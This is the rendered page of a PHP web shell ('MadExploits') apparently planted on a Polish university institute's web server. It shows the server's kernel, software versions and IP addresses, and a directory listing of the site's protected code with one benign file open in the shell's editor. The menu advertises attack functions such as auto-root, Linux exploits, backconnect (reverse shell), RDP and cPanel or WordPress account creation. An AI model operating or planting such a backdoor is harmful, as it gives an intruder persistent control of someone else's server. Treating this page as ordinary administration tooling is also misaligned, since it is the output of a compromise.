Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.218.219.11
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
v2021 /
protected /
Common /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
KAdminPage.php
346
B
-rw-r--r--
KApplication.php
313
B
-rw-r--r--
KAuthor.php
1.3
KB
-rw-r--r--
KBooleanColumn.php
1.57
KB
-rw-r--r--
KClass.php
1.85
KB
-rw-r--r--
KClassGiver.php
1.04
KB
-rw-r--r--
KClassMaterialFile.php
2.81
KB
-rw-r--r--
KContentItem.php
3.3
KB
-rw-r--r--
KDuty.php
2.82
KB
-rw-r--r--
KImage.php
7.01
KB
-rw-r--r--
KImageManager.php
1.73
KB
-rw-r--r--
KNewsItem.php
4.27
KB
-rw-r--r--
KPage.php
1.96
KB
-rw-r--r--
KPaper.php
13.62
KB
-rw-r--r--
KRightBox.php
2.82
KB
-rw-r--r--
KScheduleEntry.php
3.67
KB
-rw-r--r--
KUser.php
1.55
KB
-rw-r--r--
KUserRecord.php
10.81
KB
-rw-r--r--
PEmailer.php
445
B
-rw-r--r--
PErrorHandler.php
4.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : KPage.php
<?php class KPage extends TPage { protected $titlePrefix = null; public function getTitlePrefix() { return $this->titlePrefix; } public function Error($string) { die(iconv("utf-8", "iso-8859-2", $string)); } public function getLang() { if (isset($this->Session['ifklang'])) return $this->Session['ifklang']; else return 'pl'; } public function parseText($text) { $text = html_entity_decode($text, ENT_QUOTES | ENT_HTML5, "utf-8"); // $pl_words = "[\s\-\.A-Z0-9a-ząęśćńłóżźĄĘŚĆŃŁÓŻŹ]"; // $pl_words="[\p{L}0-9\.\-\s]"; // $pl_words="[0-9\w\.\-\s]"; $pl_words = "[^\]\[]"; $text = preg_replace_callback("/\[\[(" . $pl_words . "+)\|(" . $pl_words . "+)\]\]/ui", function ($m) { return KUserRecord::parseName($m[1], $m[0]); }, $text); $text = preg_replace_callback("/\[\[(" . $pl_words . "+)\]\]/ui", function ($m) { return KUserRecord::parseName($m[1]); }, $text); return $text; } public static function urlify($text) { setlocale(LC_ALL, 'pl_PL'); $text = preg_replace( array('/[ąĄ]/u', '/[ęĘ]/u', '/[ćĆ]/u', '/[śŚ]/u', '/[ńŃ]/u', '/[łŁ]/u', '/óÓ/u', '/[źŹżŻ]/u', '#\s+#', '#\'#', '#[^a-zA-Z0-9\-]+#', '#\-+#'), array('a', 'e', 'c', 's', 'n', 'l', 'o', 'z', '-', '', '-', '-'), $text); $text = strtolower($text); $text = trim($text," -"); return $text; } public function getOpenGraphTitle() { return $this->getTitlePrefix(); } public function getOpenGraphImage() { return $this->getApplication()->getParameters()['BASE_URL'].'/themes/front/gfx/logoXL.jpg'; } public function getOpenGraphDescription() { return "Strony Instytutu Filologii Klasycznej Uniwersytetu Warszawskiego"; } } ?>
Close